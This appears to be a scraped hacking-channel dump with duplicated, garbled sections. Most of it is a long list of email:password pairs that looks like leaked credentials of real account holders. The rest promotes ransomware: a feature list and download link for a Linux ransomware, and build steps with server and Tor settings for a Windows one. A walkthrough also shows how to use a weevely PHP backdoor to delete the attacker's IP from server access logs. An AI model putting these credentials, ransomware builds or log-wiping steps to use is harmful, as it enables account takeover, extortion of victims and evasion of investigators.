Colin_Lang869@outlook.de:woody2414
Peyton_Ziegler73954@gmail.com:rambo14963
Marvin_Kramer55545@outlook.de:a123458980
Makai_Seidel9628@t-online.de:silver7574
Kolten_Zimmermann746@gmail.com:sirius2620
Kaysen_Schulte3506@gmail.com:wayne5509
Jeremy_Lehmann45@outlook.de:jordie4045
Kyrie_Mayer1956@gmx.com:redcloud9810
Nicholas_Herrmann28705@t-online.de:1kitty3814
Johnathan_Winkler26455@outlook.de:gaston2202
Douglas_Braun60@gmx.com:seattle3847
Kashton_Becker27161@yahoo.com:rene8732
Malcolm_Mayer3352@gmx.com:gremlin9160
Enoch_Busch82030@outlook.de:jeffrey19161
Dario_Neumann79@gmx.com:josie4933
Rey_Braun06219@hotmail.de:peach1616
Bennett_Jung66746@outlook.de:forest9347
Tate_Berger77@yahoo.com:olivier8369
Mohammed_Thomas38@outlook.de:gravis2595
Byron_Walter98515@yahoo.com:explorer8567
Nickolas_Schulz90@hotmail.de:sammy1932
Adriel_Miller151@yahoo.com:december7896
Alec_Richter65967@t-online.de:catalina2899
Collin_Maier64628@yahoo.com:snuffy3035
Merrick_Wolf831@yahoo.com:pepper6122
Edgar_Roth3702@hotmail.de:slick3694
Sergio_Ziegler442@yahoo.com:johan2246
Angelo_Martin29@t-online.de:sony1453
Raiden_Haas26319@gmx.com:chess2284
Liam_Franke082@gmx.com:Matthew3934
Jace_Busch49661@gmail.com:9999999992336
Winston_Thomas26998@gmail.com:fucker4665
Rowen_Wagner16@outlook.de:skiing7069
Raiden_Frank35@yahoo.com:hillary8607
Leonidas_Miller054@gmail.com:gumby6184
Kohen_Schmitz1960@yahoo.com:robbie1182
Odin_Neumann086@t-online.de:brazil9292
Byron_Krause92@t-online.de:spartan4722
Fletcher_Stein75549@gmail.com:yvonne1504
Brayden_Wolff73@yahoo.com:cunt8047
Emiliano_Keller542@gmail.com:angie2833
Kaysen_Albrecht590@gmx.com:myspace15796
Shane_Schuster02@hotmail.de:maxime5791
Guillermo_Kaiser45@outlook.de:zebras1088
Kendall_Mayer53@hotmail.de:rita7433
Josiah_Friedrich38@t-online.de:turtle1402
Maxwell_Hofmann740@hotmail.de:stingray5434
Josue_Vogt570@gmail.com:oliver6364
Otis_Huber15373@yahoo.com:helene5748
Baylor_Kraus2127@outlook.de:civil4696
Ali_Schulz135@yahoo.com:warriors6008
Demetrius_Kaiser675@t-online.de:photo3863
Tate_Kramer7690@gmail.com:internet7201
Emmet_Pfeiffer14@gmail.com:sound3101
Michael_Scholz9972@gmx.com:tabatha9812
Everett_Keller69766@yahoo.com:sleepy3011
Salvatore_Keller86@gmx.com:starlight6930
Ariel_Maier7251@hotmail.de:sweetheart1402
Vincent_Vogt69036@t-online.de:candy6055
Logan_Mayer02783@outlook.de:impact9276
Ayan_Simon8861@gmail.com:nicolas4447
Yousef_Friedrich00@outlook.de:pamela5654
Kendall_Arnold29@outlook.de:12143288
Gannon_Weber63744@t-online.de:hootie2742
Rohan_Haas140@yahoo.com:1122331172
Saul_Meier87@gmail.com:major7029
Cyrus_Schumacher80607@hotmail.de:starlight2506
Sean_Kahn2928@t-online.de:beans8793
Connor_Martin1770@gmail.com:vampire4766
Alberto_Weiay5330@outlook.de:Fisher6414
Leroy_Schubert585@t-online.de:network2072
Cesar_Kramer952@yahoo.com:otter2370
Dawson_Schwarz96058@gmail.com:unique4154
Edison_Miller886@yahoo.com:bridges5263
Kyle_Schulte6513@gmail.com:hedgehog8751
Zavier_Bajhm00@t-online.de:ashton7784
Decker_Schmitt99@gmx.com:moroni6307
Greyson_Meier05@gmail.com:alina9615
Frederick_Hartmann2650@outlook.de:iris6402
Rowen_Scholz94852@gmx.com:dragon7930
Vincent_Koch71@gmx.com:soccer7197
Winston_Mayer09001@hotmail.de:timothy4987
Sylas_Hoffmann67@gmail.com:nikita2009
Reginald_Schrajder0853@gmail.com:justin1250
Houston_Kuhn4587@hotmail.de:letmein5382
Vincenzo_Becker393@gmail.com:bright1873
Alden_Horn557@yahoo.com:ncc17012368
Kayson_Peters327@gmail.com:casey7472
Musa_Vogel988@yahoo.com:cookie18360
Van_Winter078@outlook.de:peggy8791
Charles_Fuchs58@hotmail.de:zxc1237462
Colin_Kuhn088@yahoo.com:topcat1906
Ayaan_Schulze585@t-online.de:renee2894
Jaxxon_Simon5616@outlook.de:sundance4060
Adonis_Lorenz18581@yahoo.com:freebird3073
Kyler_Schulz6126@outlook.de:california1465
Layton_Scholz29@outlook.de:yukon3011
Moises_Maier06@gmail.com:soccer17157
Tadeo_Kahn1811@hotmail.de:britney6646
Hezekiah_Pfeiffer8213@outlook.de:looking9959
Rhys_Kahn736@yahoo.com:suckme8126
Lawson_Meyer038@t-online.de:lakers7221
Wayne_Horn083@hotmail.de:gasman3434
Jakob_Weber05881@gmail.com:harrypotter3114
Raphael_Kajnig985@t-online.de:mariah7404
Peyton_Ziegler73954@gmail.com:rambo14963
Marvin_Kramer55545@outlook.de:a123458980
Makai_Seidel9628@t-online.de:silver7574
Kolten_Zimmermann746@gmail.com:sirius2620
Kaysen_Schulte3506@gmail.com:wayne5509
Jeremy_Lehmann45@outlook.de:jordie4045
Kyrie_Mayer1956@gmx.com:redcloud9810
Nicholas_Herrmann28705@t-online.de:1kitty3814
Johnathan_Winkler26455@outlook.de:gaston2202
Douglas_Braun60@gmx.com:seattle3847
Kashton_Becker27161@yahoo.com:rene8732
Malcolm_Mayer3352@gmx.com:gremlin9160
Enoch_Busch82030@outlook.de:jeffrey19161
Dario_Neumann79@gmx.com:josie4933
Rey_Braun06219@hotmail.de:peach1616
Bennett_Jung66746@outlook.de:forest9347
Tate_Berger77@yahoo.com:olivier8369
Mohammed_Thomas38@outlook.de:gravis2595
Byron_Walter98515@yahoo.com:explorer8567
Nickolas_Schulz90@hotmail.de:sammy1932
Adriel_Miller151@yahoo.com:december7896
Alec_Richter65967@t-online.de:catalina2899
Collin_Maier64628@yahoo.com:snuffy3035
Merrick_Wolf831@yahoo.com:pepper6122
Edgar_Roth3702@hotmail.de:slick3694
Sergio_Ziegler442@yahoo.com:johan2246
Angelo_Martin29@t-online.de:sony1453
Raiden_Haas26319@gmx.com:chess2284
Liam_Franke082@gmx.com:Matthew3934
Jace_Busch49661@gmail.com:9999999992336
Winston_Thomas26998@gmail.com:fucker4665
Rowen_Wagner16@outlook.de:skiing7069
Raiden_Frank35@yahoo.com:hillary8607
Leonidas_Miller054@gmail.com:gumby6184
Kohen_Schmitz1960@yahoo.com:robbie1182
Odin_Neumann086@t-online.de:brazil9292
Byron_Krause92@t-online.de:spartan4722
Fletcher_Stein75549@gmail.com:yvonne1504
Brayden_Wolff73@yahoo.com:cunt8047
Emiliano_Keller542@gmail.com:angie2833
Kaysen_Albrecht590@gmx.com:myspace15796
Shane_Schuster02@hotmail.de:maxime5791
Guillermo_Kaiser45@outlook.de:zebras1088
Kendall_Mayer53@hotmail.de:rita7433
Josiah_Friedrich38@t-online.de:turtle1402
Maxwell_Hofmann740@hotmail.de:stingray5434
Josue_Vogt570@gmail.com:oliver6364
Otis_Huber15373@yahoo.com:helene5748
Baylor_Kraus2127@outlook.de:civil4696
Ali_Schulz135@yahoo.com:warriors6008
Demetrius_Kaiser675@t-online.de:photo3863
Tate_Kramer7690@gmail.com:internet7201
Emmet_Pfeiffer14@gmail.com:sound3101
Michael_Scholz9972@gmx.com:tabatha9812
Everett_Keller69766@yahoo.com:sleepy3011
Salvatore_Keller86@gmx.com:starlight6930
Ariel_Maier7251@hotmail.de:sweetheart1402
Vincent_Vogt69036@t-online.de:candy6055
Logan_Mayer02783@outlook.de:impact9276
Ayan_Simon8861@gmail.com:nicolas4447
Yousef_Friedrich00@outlook.de:pamela5654
Kendall_Arnold29@outlook.de:12143288
Gannon_Weber63744@t-online.de:hootie2742
Rohan_Haas140@yahoo.com:1122331172
Saul_Meier87@gmail.com:major7029
Cyrus_Schumacher80607@hotmail.de:starlight2506
Sean_Kahn2928@t-online.de:beans8793
Connor_Martin1770@gmail.com:vampire4766
Alberto_Weiay5330@outlook.de:Fisher6414
Leroy_Schubert585@t-online.de:network2072
Cesar_Kramer952@yahoo.com:otter2370
Dawson_Schwarz96058@gmail.com:unique4154
Edison_Miller886@yahoo.com:bridges5263
Kyle_Schulte6513@gmail.com:hedgehog8751
Zavier_Bajhm00@t-online.de:ashton7784
Decker_Schmitt99@gmx.com:moroni6307
Greyson_Meier05@gmail.com:alina9615
Frederick_Hartmann2650@outlook.de:iris6402
Rowen_Scholz94852@gmx.com:dragon7930
Vincent_Koch71@gmx.com:soccer7197
Winston_Mayer09001@hotmail.de:timothy4987
Sylas_Hoffmann67@gmail.com:nikita2009
Reginald_Schrajder0853@gmail.com:justin1250
Houston_Kuhn4587@hotmail.de:letmein5382
Vincenzo_Becker393@gmail.com:bright1873
Alden_Horn557@yahoo.com:ncc17012368
Kayson_Peters327@gmail.com:casey7472
Musa_Vogel988@yahoo.com:cookie18360
Van_Winter078@outlook.de:peggy8791
Charles_Fuchs58@hotmail.de:zxc1237462
Colin_Kuhn088@yahoo.com:topcat1906
Ayaan_Schulze585@t-online.de:renee2894
Jaxxon_Simon5616@outlook.de:sundance4060
Adonis_Lorenz18581@yahoo.com:freebird3073
Kyler_Schulz6126@outlook.de:california1465
Layton_Scholz29@outlook.de:yukon3011
Moises_Maier06@gmail.com:soccer17157
Tadeo_Kahn1811@hotmail.de:britney6646
Hezekiah_Pfeiffer8213@outlook.de:looking9959
Rhys_Kahn736@yahoo.com:suckme8126
Lawson_Meyer038@t-online.de:lakers7221
Wayne_Horn083@hotmail.de:gasman3434
Jakob_Weber05881@gmail.com:harrypotter3114
Raphael_Kajnig985@t-online.de:mariah7404
Agustin_Koch139@outlook.de:rock2024
Lukas_Wolff786@t-online.de:topcat6710
Tristan_Fuchs61495@gmail.com:dilbert3111
Nickolas_Ziegler63016@yahoo.com:dolphin9552
Kohen_Mayer444@gmail.com:orville6936
Elijah_Kaiser56@t-online.de:Anthony3304
William_Winter36344@t-online.de:burns8618
Simeon_Roth891@yahoo.com:lucky18638
Dominik_Herrmann62@hotmail.de:free1801
Brixton_Ludwig726@t-online.de:people6925
Mike_Martin909@hotmail.de:change3960
Roman_Bauer2487@hotmail.de:Rebecca8415
Briggs_Meier43@hotmail.de:white7267
Dariel_Becker77226@gmail.com:tatiana7396
Dustin_Kajnig60@gmail.com:jackie19946
Koda_Schreiber9397@gmx.com:willow2120
Casen_Hoffmann424@gmx.com:monkey15963
Noel_Schulte31086@gmx.com:reznor7976
Tobias_Sauer4378@t-online.de:captain3986
Cayson_Braun88@gmx.com:branch5940
Kasen_Maier129@outlook.de:hello4289
Castiel_Graf92@hotmail.de:planet8949
Sage_Franke96086@gmx.com:dawn8226
Daxton_Huber1740@yahoo.com:carebear7111
Vicente_Groay48464@gmail.com:lacrosse4924
Jakob_Hofmann085@gmx.com:megan1675
Barrett_Franke6269@outlook.de:aragorn1938
Musa_Herrmann555@hotmail.de:tristan6724
Cayden_Schulte41608@gmail.com:Tennis8995
Aydin_Zimmermann7710@yahoo.com:bianca7209
Orion_Schneider52461@yahoo.com:00074267
Harvey_Klein10338@gmail.com:Nicholas3166
Johnny_Schrajder498@t-online.de:tommy9044
Emmanuel_Ziegler691@outlook.de:shadow8207
Maxim_Ziegler063@hotmail.de:samiam9723
Camron_Schulte57701@gmail.com:pirate3429
Zyaire_Majller598@gmail.com:bonjour7635
Alexis_Koch92590@yahoo.com:paradigm2536
Bodie_Mayer64@yahoo.com:renegade4176
Talon_Pfeiffer39946@yahoo.com:aerobics7309
Layton_Zimmermann900@hotmail.de:theresa5116
Johan_Martin8081@gmx.com:eagles8961
Davion_Haas135@gmail.com:steaua4676
Chaim_Heinrich42@gmx.com:booger8128
Fox_Schulze024@t-online.de:888888887438
Julio_Schulz76632@yahoo.com:estrella2378
Eduardo_Wagner77@hotmail.de:jonathan4890
Darrell_Krause396@gmail.com:warrior4289
Demetrius_Bergmann4453@gmx.com:gumby6713
Santiago_Schulte52@t-online.de:rookie1375
Harold_Sommer71@gmail.com:smurfy1382
Skylar_Zimmermann44@gmx.com:flamingo4417
Miller_Herrmann38@hotmail.de:robert16345
Finnegan_Otto6886@outlook.de:trebor8771
Tate_Berger42053@t-online.de:yvette2385
Kareem_Bergmann71@hotmail.de:frederic8545
Leroy_Fuchs65@hotmail.de:dakota8107
Lyle_Jung19@gmx.com:0070073648
Weston_Kaiser18396@gmail.com:cinema3924
Kai_Sommer92@outlook.de:fishing7285
Joseph_Stein44636@hotmail.de:135795017
Zayne_Schulte55@gmx.com:passwd1992
Legend_Scholz6019@gmail.com:storm4241
Brock_Vogt393@gmx.com:test1236681
Gael_Engel747@t-online.de:britain4294
Uriah_Busch5969@outlook.de:pantera7661
Alberto_Schulte8597@gmail.com:steph3558
Alvin_Schuster823@outlook.de:bailey3684
Raymond_Brandt04@hotmail.de:foster8311
Kody_Kahn7214@gmail.com:lakers3424
Eli_Klein837@gmx.com:chameleon2695
Jefferson_Sauer70574@t-online.de:buffy6125
Bentley_Wolff755@yahoo.com:hotstuff3125
Koda_Voigt9435@outlook.de:bobcat8688
Christopher_Dietrich11754@gmail.com:qwaszx8335
Beckham_Haas873@t-online.de:hummer5568
Rodney_Kajnig8662@gmail.com:escort19655
Warren_Albrecht7839@t-online.de:beaner6340
Tristian_Hahn76@t-online.de:paradigm4225
Emery_Majller213@gmx.com:jesus11977
Ethan_Lang78@outlook.de:test1238641
Israel_Pfeiffer45@gmx.com:iguana5206
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Lukas_Wolff786@t-online.de:topcat6710
Tristan_Fuchs61495@gmail.com:dilbert3111
Nickolas_Ziegler63016@yahoo.com:dolphin9552
Kohen_Mayer444@gmail.com:orville6936
Elijah_Kaiser56@t-online.de:Anthony3304
William_Winter36344@t-online.de:burns8618
Simeon_Roth891@yahoo.com:lucky18638
Dominik_Herrmann62@hotmail.de:free1801
Brixton_Ludwig726@t-online.de:people6925
Mike_Martin909@hotmail.de:change3960
Roman_Bauer2487@hotmail.de:Rebecca8415
Briggs_Meier43@hotmail.de:white7267
Dariel_Becker77226@gmail.com:tatiana7396
Dustin_Kajnig60@gmail.com:jackie19946
Koda_Schreiber9397@gmx.com:willow2120
Casen_Hoffmann424@gmx.com:monkey15963
Noel_Schulte31086@gmx.com:reznor7976
Tobias_Sauer4378@t-online.de:captain3986
Cayson_Braun88@gmx.com:branch5940
Kasen_Maier129@outlook.de:hello4289
Castiel_Graf92@hotmail.de:planet8949
Sage_Franke96086@gmx.com:dawn8226
Daxton_Huber1740@yahoo.com:carebear7111
Vicente_Groay48464@gmail.com:lacrosse4924
Jakob_Hofmann085@gmx.com:megan1675
Barrett_Franke6269@outlook.de:aragorn1938
Musa_Herrmann555@hotmail.de:tristan6724
Cayden_Schulte41608@gmail.com:Tennis8995
Aydin_Zimmermann7710@yahoo.com:bianca7209
Orion_Schneider52461@yahoo.com:00074267
Harvey_Klein10338@gmail.com:Nicholas3166
Johnny_Schrajder498@t-online.de:tommy9044
Emmanuel_Ziegler691@outlook.de:shadow8207
Maxim_Ziegler063@hotmail.de:samiam9723
Camron_Schulte57701@gmail.com:pirate3429
Zyaire_Majller598@gmail.com:bonjour7635
Alexis_Koch92590@yahoo.com:paradigm2536
Bodie_Mayer64@yahoo.com:renegade4176
Talon_Pfeiffer39946@yahoo.com:aerobics7309
Layton_Zimmermann900@hotmail.de:theresa5116
Johan_Martin8081@gmx.com:eagles8961
Davion_Haas135@gmail.com:steaua4676
Chaim_Heinrich42@gmx.com:booger8128
Fox_Schulze024@t-online.de:888888887438
Julio_Schulz76632@yahoo.com:estrella2378
Eduardo_Wagner77@hotmail.de:jonathan4890
Darrell_Krause396@gmail.com:warrior4289
Demetrius_Bergmann4453@gmx.com:gumby6713
Santiago_Schulte52@t-online.de:rookie1375
Harold_Sommer71@gmail.com:smurfy1382
Skylar_Zimmermann44@gmx.com:flamingo4417
Miller_Herrmann38@hotmail.de:robert16345
Finnegan_Otto6886@outlook.de:trebor8771
Tate_Berger42053@t-online.de:yvette2385
Kareem_Bergmann71@hotmail.de:frederic8545
Leroy_Fuchs65@hotmail.de:dakota8107
Lyle_Jung19@gmx.com:0070073648
Weston_Kaiser18396@gmail.com:cinema3924
Kai_Sommer92@outlook.de:fishing7285
Joseph_Stein44636@hotmail.de:135795017
Zayne_Schulte55@gmx.com:passwd1992
Legend_Scholz6019@gmail.com:storm4241
Brock_Vogt393@gmx.com:test1236681
Gael_Engel747@t-online.de:britain4294
Uriah_Busch5969@outlook.de:pantera7661
Alberto_Schulte8597@gmail.com:steph3558
Alvin_Schuster823@outlook.de:bailey3684
Raymond_Brandt04@hotmail.de:foster8311
Kody_Kahn7214@gmail.com:lakers3424
Eli_Klein837@gmx.com:chameleon2695
Jefferson_Sauer70574@t-online.de:buffy6125
Bentley_Wolff755@yahoo.com:hotstuff3125
Koda_Voigt9435@outlook.de:bobcat8688
Christopher_Dietrich11754@gmail.com:qwaszx8335
Beckham_Haas873@t-online.de:hummer5568
Rodney_Kajnig8662@gmail.com:escort19655
Warren_Albrecht7839@t-online.de:beaner6340
Tristian_Hahn76@t-online.de:paradigm4225
Emery_Majller213@gmx.com:jesus11977
Ethan_Lang78@outlook.de:test1238641
Israel_Pfeiffer45@gmx.com:iguana5206
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Ransomware Impact on industry2020 :
https://medium.com/@tarcisioma/how-can-a-malware-encrypt-a-company-existence-c7ed584f66b3
How this ransomware encryption scheme works:
https://medium.com/@tarcisioma/ransomware-encryption-techniques-696531d07bb9
How this ransomware works:
https://0x00sec.org/t/how-ransomware-works-and-gonnacry-linux-ransomware/4594
https://medium.com/@tarcisioma/how-ransomware-works-and-gonnacry-linux-ransomware-17f77a549114
Mentions:
https://www.sentinelone.com/blog/sentinelone-detects-prevents-wsl-abuse/
https://hackingvision.com/2017/07/18/gonnacry-linux-ransomware/
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Ransomware Impact on industry2020 :
https://medium.com/@tarcisioma/how-can-a-malware-encrypt-a-company-existence-c7ed584f66b3
How this ransomware encryption scheme works:
https://medium.com/@tarcisioma/ransomware-encryption-techniques-696531d07bb9
How this ransomware works:
https://0x00sec.org/t/how-ransomware-works-and-gonnacry-linux-ransomware/4594
https://medium.com/@tarcisioma/how-ransomware-works-and-gonnacry-linux-ransomware-17f77a549114
Mentions:
https://www.sentinelone.com/blog/sentinelone-detects-prevents-wsl-abuse/
https://hackingvision.com/2017/07/18/gonnacry-linux-ransomware/
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Medium
How can a malware encrypt a company existence ?
More than 4,000 ransomware attacks occur daily, according to FBI.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 lINUX ransoware :
π¦FEATURES :
encrypt all user files with AES-256-CBC.
Random AES key and IV for each file.
Works even without internet connection.
Communication with the server to decrypt Client-private-key.
encrypt AES key with client-public-key RSA-2048.
encrypt client-private-key with RSA-2048 server-public-key.
Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
Decryptor that communicate to server to send keys.
python webserver
Daemon
Dropper
Kill databases
π¦ DOWNLOAD :
https://github.com/tarcisio-marinho/GonnaCry
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 lINUX ransoware :
π¦FEATURES :
encrypt all user files with AES-256-CBC.
Random AES key and IV for each file.
Works even without internet connection.
Communication with the server to decrypt Client-private-key.
encrypt AES key with client-public-key RSA-2048.
encrypt client-private-key with RSA-2048 server-public-key.
Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
Decryptor that communicate to server to send keys.
python webserver
Daemon
Dropper
Kill databases
π¦ DOWNLOAD :
https://github.com/tarcisio-marinho/GonnaCry
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - tarcisio-marinho/GonnaCry: A Linux Ransomware
A Linux Ransomware. Contribute to tarcisio-marinho/GonnaCry development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How Clean IP address from logs
instagram.com/UndercoDETESTING
This tutorial shows how to clean up the access traces from the logs in a server which which does not allow shell commands execution, provided that the target log file is writable by the user running our agent backdoor.
Configuration
Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
Used modules: file_grep (grep), system_info, file_rm (rm), file_cp (cp)
Session
In the example shared hosting server configuration, the HTTP access log file of the user's virtual host is kept in the ~/logs/ folder.
$ ./weevely.py http://target/agent.php mypassword
[+] weevely 3.0
[+] Target: target
[+] Session: _weevely/sessions/target/agent_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> ls
.
..
htdocs
logs
cpanel
.profile
cgi-bin
member@target:/home/member PHP> cd logs
member@target:/home/member/logs PHP> ls
.
..
access.log
member@target:/home/member/logs PHP>
Now run the system_info command to find out our IP address from which our connection came from.
member@target:/home/member/logs PHP> :system_info -info client_ip
174.122.136.104
member@target:/home/member/logs PHP>
Now run the grep command (an alias for the file_grep module) to find out if our IP address has been logged in the log file.
member@target:/home/member/logs PHP> grep access.log 174.122.136.104
174.122.136.104 - - [21/Apr/2015:20:37:04 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://www.google.co.uz/url?sa=t&rct=j&source=web&cd=136&ved=d7fQaxNTP&ei=qpG-lx-Uque6l97bG_EZfE&usg=FL237uTSYjAc8DC-d971rS4UUPyWV13nyK" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3"
174.122.136.104 - - [21/Apr/2015:20:34:01 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&usg=200QawVTBiv_BPoQJdoQhA-yTa66mtGaEA" "Opera/9.52 (Macintosh; Intel Mac OS X; U; pt-BR)"
174.122.136.104 - - [21/Apr/2015:20:28:24 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://www.google.com.uy/url?sa=t&rct=j&source=web&cd=183&ved=DJY1U23wu&ei=GfRq0HsncZ7nn32louwyv0&usg=oYydfzk5nYywMujSFCTAmFvz3i3U7IYMDW" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.4 (build 02647) Firefox/3.5.6 (.NET CLR 3.5.30729)"
We can see the activities from our IP address have been logged. We can run again grep with the -v option to remove our IP from the log which we'll save to a temporary file.
member@target:/home/member/logs PHP> grep access.log -v 174.122.136.104 -output cleaned.log
member@target:/home/member/logs PHP>
Let's test if our IP has been actually removed
member@target:/home/member/logs PHP> grep cleaned.log 174.122.136.104
member@target:/home/member/logs PHP>
Now we can replace the cleaned.log with the real access.log.
member@target:/home/member/logs PHP> rm access.log
member@target:/home/member/logs PHP> cp cleaned.log access.log
member@target:/home/member/logs PHP> rm cleaned.log
Our tracks are now removed from the target log file.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How Clean IP address from logs
instagram.com/UndercoDETESTING
This tutorial shows how to clean up the access traces from the logs in a server which which does not allow shell commands execution, provided that the target log file is writable by the user running our agent backdoor.
Configuration
Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
Used modules: file_grep (grep), system_info, file_rm (rm), file_cp (cp)
Session
In the example shared hosting server configuration, the HTTP access log file of the user's virtual host is kept in the ~/logs/ folder.
$ ./weevely.py http://target/agent.php mypassword
[+] weevely 3.0
[+] Target: target
[+] Session: _weevely/sessions/target/agent_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> ls
.
..
htdocs
logs
cpanel
.profile
cgi-bin
member@target:/home/member PHP> cd logs
member@target:/home/member/logs PHP> ls
.
..
access.log
member@target:/home/member/logs PHP>
Now run the system_info command to find out our IP address from which our connection came from.
member@target:/home/member/logs PHP> :system_info -info client_ip
174.122.136.104
member@target:/home/member/logs PHP>
Now run the grep command (an alias for the file_grep module) to find out if our IP address has been logged in the log file.
member@target:/home/member/logs PHP> grep access.log 174.122.136.104
174.122.136.104 - - [21/Apr/2015:20:37:04 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://www.google.co.uz/url?sa=t&rct=j&source=web&cd=136&ved=d7fQaxNTP&ei=qpG-lx-Uque6l97bG_EZfE&usg=FL237uTSYjAc8DC-d971rS4UUPyWV13nyK" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3"
174.122.136.104 - - [21/Apr/2015:20:34:01 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&usg=200QawVTBiv_BPoQJdoQhA-yTa66mtGaEA" "Opera/9.52 (Macintosh; Intel Mac OS X; U; pt-BR)"
174.122.136.104 - - [21/Apr/2015:20:28:24 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://www.google.com.uy/url?sa=t&rct=j&source=web&cd=183&ved=DJY1U23wu&ei=GfRq0HsncZ7nn32louwyv0&usg=oYydfzk5nYywMujSFCTAmFvz3i3U7IYMDW" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.4 (build 02647) Firefox/3.5.6 (.NET CLR 3.5.30729)"
We can see the activities from our IP address have been logged. We can run again grep with the -v option to remove our IP from the log which we'll save to a temporary file.
member@target:/home/member/logs PHP> grep access.log -v 174.122.136.104 -output cleaned.log
member@target:/home/member/logs PHP>
Let's test if our IP has been actually removed
member@target:/home/member/logs PHP> grep cleaned.log 174.122.136.104
member@target:/home/member/logs PHP>
Now we can replace the cleaned.log with the real access.log.
member@target:/home/member/logs PHP> rm access.log
member@target:/home/member/logs PHP> cp cleaned.log access.log
member@target:/home/member/logs PHP> rm cleaned.log
Our tracks are now removed from the target log file.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦GOOD RANSOMWARE FOR WINDOWS
> A POC Windows crypto-ransomware (Academic)
t.me/UndercodeTesting
π¦ WHAT IS RANSOMWARE ?
Ransomware is a type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files unless a ransom is paid. More modern ransomware families, collectively categorized as crypto-ransomware, encrypt certain file types on infected systems and forces users to pay the ransom
through certain online payment methods to get a decrypt key.
π¦ FEATURES :
Run in Background (or not)
Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
RSA-4096 to secure the client/server communication.
Includes an Unlocker.
Optional TOR Proxy support.
Use an AES CTR Cypher with stream encryption to avoid load an entire file into memory.
Walk all drives by default.
Docker image for compilation.
π¦πβπππΈπππππΈπππβ & βπβ :
First of all download the project outside your $GOPATH:
git clone github.com/mauri870/ransomware
cd ransomware
If you have Docker skip to the next section.
You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:
make deps
make
You can build the server for windows with make -e GOOS=windows.
Docker
./build-docker.sh make
Config Parameters
You can change some of the configs during compilation. Instead of run only make, you can use the following variables:
HIDDEN='-H windowsgui' # optional. If present the malware will run in background
USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server
SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware
SERVER_PORT=8080 # the server port, if using a domain you can set this to 80
GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
@uNDERCODETesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦GOOD RANSOMWARE FOR WINDOWS
> A POC Windows crypto-ransomware (Academic)
t.me/UndercodeTesting
π¦ WHAT IS RANSOMWARE ?
Ransomware is a type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files unless a ransom is paid. More modern ransomware families, collectively categorized as crypto-ransomware, encrypt certain file types on infected systems and forces users to pay the ransom
through certain online payment methods to get a decrypt key.
π¦ FEATURES :
Run in Background (or not)
Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
RSA-4096 to secure the client/server communication.
Includes an Unlocker.
Optional TOR Proxy support.
Use an AES CTR Cypher with stream encryption to avoid load an entire file into memory.
Walk all drives by default.
Docker image for compilation.
π¦πβπππΈπππππΈπππβ & βπβ :
First of all download the project outside your $GOPATH:
git clone github.com/mauri870/ransomware
cd ransomware
If you have Docker skip to the next section.
You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:
make deps
make
You can build the server for windows with make -e GOOS=windows.
Docker
./build-docker.sh make
Config Parameters
You can change some of the configs during compilation. Instead of run only make, you can use the following variables:
HIDDEN='-H windowsgui' # optional. If present the malware will run in background
USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server
SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware
SERVER_PORT=8080 # the server port, if using a domain you can set this to 80
GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
@uNDERCODETesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
